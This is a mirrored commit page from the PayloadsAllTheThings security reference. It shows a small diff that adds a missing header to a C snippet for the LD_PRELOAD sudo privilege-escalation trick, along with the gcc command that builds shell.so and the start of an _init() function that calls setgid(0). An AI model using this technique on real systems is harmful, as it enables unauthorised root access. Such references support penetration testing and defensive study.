mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-03-04 15:27:18 +00:00
add missing header file
This commit is contained in:
parent
3a4bd97762
commit
9086ff9d03
1 changed files with 2 additions and 1 deletions
|
@ -442,10 +442,11 @@ Defaults env_keep += LD_PRELOAD
|
|||
|
||||
Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
|
||||
|
||||
```powershell
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
void _init() {
|
||||
unsetenv("LD_PRELOAD");
|
||||
setgid(0);
|
||||
|
|
Loading…
Add table
Reference in a new issue